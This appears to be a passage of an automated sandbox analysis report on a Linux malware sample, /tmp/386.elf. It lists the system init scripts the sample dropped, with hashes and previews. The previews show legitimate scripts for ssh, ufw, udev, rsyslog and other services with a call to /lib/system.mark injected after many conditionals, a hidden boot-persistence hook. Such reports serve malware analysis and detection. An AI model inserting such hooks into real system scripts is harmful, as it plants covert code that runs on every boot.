SHA-256:	7C1F374BB9BBDB94BE70ED2E096594A97C0A8E4A79F28F7D5789A0BE7BCE4983
SHA-512:	C5E80E9CBB87EE001E60B84D8A89464BE8661EAD8CAF2453A20B8073EF0CF87524FF1959FF1020F363F7341A3938614FBA6258FFE145AF1B4DD826D5DA5D923B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system.mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system.mark.for slave in slaves/;.do..if [ "$slave" = "slaves/" ]; then./lib/system.mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath \| sed -n "s/$.$: . $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system.mark....log_daemon_msg "Root is on a multipathed device, multipathd c

/etc/init.d/open-iscsi

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.114269594803135
Encrypted:	false
SSDEEP:	48:7UMRMrEm3cy8NL/NgZlfHMtWBAl3ATeTPAdWI4RdWdtRHg02AC9ArANTcAhicF:7b2rH338lmZlfs/lwA4dWI6C7DUbL
MD5:	B48EB035141800F7976971DFDB30D671
SHA1:	18D8B59AD64232DEBB186270DA8172D0C1DE47A8
SHA-256:	E28FD9022AC23B3ED07D6223DC2EAA12DDE98FAA3D8AF142CB091C9C58ACB3A3
SHA-512:	7D617DC4E0DA0BE90FB869253093E122A9EF3F78AE0F838167BDF210AA0310A2E753EB2E22B45A9BE4E05C4DDE711AE0768BC3CF21650D990F3BFF29D4D59EA7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] \|\| exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system.mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system.mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] \|\| ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l

/etc/init.d/open-vm-tools

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1881
Entropy (8bit):	4.866964949464276
Encrypted:	false
SSDEEP:	48:1a/f0aOHh8R/X/DA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB8Rk4e8j8Q8Ml8OmooG2D3k
MD5:	97AC49C2355ACB94890353EE4381A945
SHA1:	D847EF688D5785E54FB463C2E00B0922BA0E4060
SHA-256:	86FBD32099B190A52DFF0ADCFB72BE3F9C13C3A6F47DE40EA3DF1E056B9616B5
SHA-512:	FA42FE8BD21D8C08CD437817F9E29EEED43961E13E3E0456E42696921D14BCD307A0E38580D2DD97D5D5F0A23BF8523748BAB6AA1187D227EE7F5DD99207911E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system.mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} \| grep -iq vmware; then./lib/system.mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1.

/etc/init.d/plymouth

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.307601355730172
Encrypted:	false
SSDEEP:	24:1sqE3A2EYVwMwRwDTMBgK2APfcVwAPYIpPgfS+UGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzJAsVwAgGYfdUz58Y9f5v
MD5:	0F6B71C6CC119B9DDB34511BD4CF6A49
SHA1:	F7D8BE03B71EB7597F724CB97C2A8AE62F14A843
SHA-256:	6A8A127B9D7DE62A9130A55E39521A26D48BE4EC9830AC0C986E3202FE5C5B3C
SHA-512:	EA0DA81729692BA97978031A72AA79B06E004F1B6D9AE534C68F34AEB65A5FFD9F91F5C1CA27CB6E38DE20E86A0C3C6E5A84C0A70E011C5D91AFBBA7EA647BB4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash)....SPLASH="true"....;;....nosplash\|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system.mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV

/etc/init.d/plymouth-log

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	787
Entropy (8bit):	5.281955883729912
Encrypted:	false
SSDEEP:	12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCRzD02xgvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgMHxgvR4MLoVS
MD5:	F42950D3F937B049D8ECC88A59A65CA3
SHA1:	E74080DDEE0664F4069E7558C68D2795B752DC55
SHA-256:	6637BB47EA46FB3556AF6B2A9A39574046FD06237D0BB65D7077F3734B593A00
SHA-512:	15E48460FDDF9863D5827E8B584BBED72C7EA95DF67C4A9A68E5CF4750C35DEFB8C5C6311DCDCEE9E2608DEE91DC6F76F8D6ED69287F6619AFCF5904AA72A168
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system.mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop\|restart\|force-reload)....;;...*)...echo "Usage: ${0} {start\|stop\|restart\|force-reload}" >&2...exit 1...;;.esac..exit 0..

/etc/init.d/procps

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.254527998623176
Encrypted:	false
SSDEEP:	12:atdRDNeBuYryMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLXx/25+Z+nMfTWTeCKa3VfhL69z0
MD5:	CBFDB92FECA62D963DF3A25F15C3E88D
SHA1:	14A84AD6ACD0DDD5777C86FAC10894212CE44F57
SHA-256:	84225825C32D1961412656F3D0F7D43B2BBB7BB84B34B94B8C678BAC10367DF2
SHA-512:	1FF7EC530B2CEB51C342E1103849F79B935EAC27965C081F90298B74909C1676B88CBEC2E792418F00CC8BFECB4E47B28F137B233A2325F508A550236BDADE4B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system \|\| STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..

/etc/init.d/rsync

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4639
Entropy (8bit):	5.255106060955411
Encrypted:	false
SSDEEP:	96:jdRMYo498R0Fz/T+U0lKMuHk8gajHoNUMkx:jdRMYJ98i+U0c1Ex6INUJx
MD5:	4D1E075A3D6AB76CE7754595802D6C77
SHA1:	F44434087B007BABB314B8277FFC731930DF0A13
SHA-256:	5E770B82809000BC0C33FA4901341EC6379D5B799AF444850D0C8D5B33E9B7F9
SHA-512:	59F9462BCF7A5606187A4EBA51C41D243A5C9EDE484FDD65BA28322F476C22F5FA6866D87C55C40C14E676C4BBD8D4D8455FCADEAECBF7DEA26262DF6418C72B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system.mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue\|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail

/etc/init.d/rsyslog

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2899
Entropy (8bit):	5.277181564959481
Encrypted:	false
SSDEEP:	48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ih3iLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ih3iR5JT
MD5:	816DFAE328401DBA31A79591D3EBC3F2
SHA1:	C42E6F379838212F512CB4EEFEBBCD33DF67F7F0
SHA-256:	72FADCABE0BF5AD5B5BC3382B434617A3E58EE6FE8FA959B8698E5C0EACCA22F
SHA-512:	62D2B90E1EA0070B376E8E9E9E6BF49094B58491D66FD30482EA1A34FC6CDB7010B12C30012320BE3E963B6D38521E6E36E71AF069115852927859FAF30979DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] \|\| exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st

/etc/init.d/saned

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2293
Entropy (8bit):	5.008592969018552
Encrypted:	false
SSDEEP:	24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHwdNw5G/9yNuFibjBk2Jwq5MxnR5/2F:e7Y0u/i5t7RbewG/9diy2OXnL/iOs1
MD5:	0F06F605D05EA59E83CFDB744A720668
SHA1:	ED458D2DC1CF9F7EEACF612295016DD4C67FA431
SHA-256:	1C4C499846B5D9E180E604B84553A2ADD06C11D447C4AC5F42DB30EF5030944D
SHA-512:	B3BA6C58E83F3C79C6E28AC8EB78184003A17AB8635F013BBBD50363D515344B5619CA008F9F453A8BBBCA01BCF0E649828B0CB1ED6D1BE87085CA4E225FF84C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON \|\| exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system.mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N

/etc/init.d/screen-cleanup

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	5.012565313964516
Encrypted:	false
SSDEEP:	24:c26Nr+XEgBYxABoO21phrqeYCRjeyvcsTN/RdT7d/Ldld/7K9jp:cPQoO23BqeYSjeybRRdHdTdld/7K9jp
MD5:	8EFA67FAE6C01453D5F673251C44E223
SHA1:	ADDB6A8C1B7D583B959EDF19684A1BE2FA76D541
SHA-256:	48026B299BBAD064F39CB6351B3E6D60E6EA324BB9DF6D777D132F19B2386E5D
SHA-512:	306042F4929D7BCBB98CC2E14A04D3E36DA7E7BA87F7997CD46DCD7DD2F856D1102469B99D623F6F339F419FD247EBE0ED02C446ADE7FD214F6F14A9156B45F0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen \|\| exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR \|\| ! test -d $SCREENDIR; then./lib/system.mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "

/etc/init.d/spice-vdagent

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2519
Entropy (8bit):	4.743587167790472
Encrypted:	false
SSDEEP:	48:DFZazGMU+rI4CXyUH0I6zroGt//AhrHoGa//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGtQRHoGaQuiIngczVII
MD5:	5D4D9388F89B176957FDD414AF0D3385
SHA1:	206408E65660EFF14DE046FBECC38DDA2BCD403F
SHA-256:	9EDA8584AF6D1D332C01FD105D83BF5DBD41E10148E276D350DE07835A64494D
SHA-512:	CA317DCB2DB3D6EB63088CF6548CF800C5B2D64430C34F0E587EFA9CE7B4D72B35AAD70516BEECCC19848D3AF3673DAB295F19E923BA5E4700234842BFE38EF8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic

/etc/init.d/ssh

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4195
Entropy (8bit):	5.078291501927291
Encrypted:	false
SSDEEP:	96:jkXSV2BP3Jr4VRy5HoYokXHe5KyWU/O8IhQ:j1ol3J8VOIPq3cBIhQ
MD5:	53996396D16C98D4AF1BF71D33AE801F
SHA1:	D47C0F3E4DE104B2DAE047AC53BA85ADFD53B26B
SHA-256:	D2C361A5A6A9FDEAF530420A519CA1BCB022B13B5B35B827544D70ED99B98720
SHA-512:	34636E86E4652B1212E5F74E4E792E46786E5FDFDB9ECB7DB085339EDCA9DF752D7B71EF97FE4738921E53825DFB0AECCE877324675A60594A0955B4EC2BFB38
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd \|\| exit 0.( /usr/sbin/sshd -\? 2>&1 \| grep -q OpenSSH ) 2>/dev/null \|\| exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system.mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system.mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) \|\| [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system.mark..if [ "$1" = log_end_msg ]; then./lib/system.mark.. log_end_msg 0 \|\| true..fi..if ! run_by_init; then./lib/syst

/etc/init.d/udev

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	7281
Entropy (8bit):	4.991252121789465
Encrypted:	false
SSDEEP:	96:l7vnKGhtBLNNqeIRbyxwfmgBL6FGGgGBj2davQKBJKCYrSVDvtvP7WGP7TQKBJKk:l93DYPbV7+262daaJrSVztbWIeWymj
MD5:	6B8B951DD1036426916D86617F889FB3
SHA1:	5845C804AEE0A2C89AA314083FDB112D90B0AE75
SHA-256:	672A832E328D4AC70CE72DB88A220443383378ED574448B8A31F743707EAB48D
SHA-512:	DC3D3C056719853FE920BF0622CACFEDE05618331D85DC138C7C462B982222F2F746AF09B77815CDE542DACA4DCD24D084912CCE5F7DEE608431776D3B21BEC4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system.mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system.mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system.mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -

/etc/init.d/ufw

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	4.762470767686369
Encrypted:	false
SSDEEP:	48:1LleiFZd/nzngwjacTM/JrNWwh/JbeTX9l:1BDFfrbQvnq
MD5:	8852A1EF1E949822CC57D126739775E7
SHA1:	BB530632CE040ACF6D772A83E55594AE03233D2A
SHA-256:	D47B4F30B3710EBA0EA899BD483D2639EEC4EFE1E2196F3CC69D6C317A182D9D
SHA-512:	428D49507F1A9E84BE55BA66EBD1E6557E87EABE10BC4CAB0003260279FADE812996410AFD00DA0C49E1A42C2008D2B61ADC7A43470C582FC66840120A827A1D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] \|\| exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system.mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] \|\| [ "$ENABLED" = "YES" ]; then./lib/system.mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` \|\| error="$?". if [ "$error" = "0" ]; then./lib/system.mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system.mark. echo "$output" \| while read

/etc/init.d/unattended-upgrades

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	5.3259172883252655
Encrypted:	false
SSDEEP:	24:aMXni+12wpFKFOGofwWlf/HNVKowwflH+hF/7Px1gr:bni23FKFpbw3GnoH+Dbx2
MD5:	D520212A01E843BEC46C2A22FAD820FD
SHA1:	53E168B97E300038916C1038B59912B23AB2C0AF
SHA-256:	89C4F9A9999E7DB3526C63DF22A69161F6328EEB8E58B8640BDEB4676BFF6DA5
SHA-512:	E08F7E3736EB322F4C49636515B1AAE43299F09504A63B9920F93D2E42518108E4090E3F622AA6B18E2D196C89BAC0BF74884AA5FDC023CE25D8D529653D0876
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system.mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.

/etc/init.d/uuidd

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	5.2132074992430075
Encrypted:	false
SSDEEP:	24:aNmC4ozLk8BZa8LNfwa0dDEPLu5CB5ZM51Hdwi/DqT0KtOC:3VozBjdh0d4PLuIBvMNwiuIKtl
MD5:	4A25430D50590B5FD530703742868720
SHA1:	FB4D80FD6B01795838C4D0A49B1467910FF3FB4D
SHA-256:	0CE2C7B3FEA143F8855B7BE493906899F6CAFC7D9558AB315D10E62CAF59AC61
SHA-512:	15375558913D6AF219281A08A470F8BEBC4B729119DC317D9FBFE60892F9CB76AD9BF8704BC0CE7FB3BF5EFA3BE279021EC8000AF4AB3E4034D0CE67C12F91D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system.mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&

/etc/init.d/x11-common

Download File

Process:	/tmp/386.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2911
Entropy (8bit):	4.896684913637708
Encrypted:	false
SSDEEP:	48:ZETjwC4gFkV8ZSVwxPRyye1vrBy9DuIpPX5uCXAepm1L+/WAhtX76XGMgH3:SIgFkVlVY1IT09DuYX5HX3aidOX8
MD5:	ED4AAC2A7BFA47958A11198C382AF668
SHA1:	3646EAC456824AA2D579E5E66F8050CC886C44E7
SHA-256:	8D107A508429EC4AE1049F1BB79260CC2B4E10EDB952DC764FB4ED7979A409AC
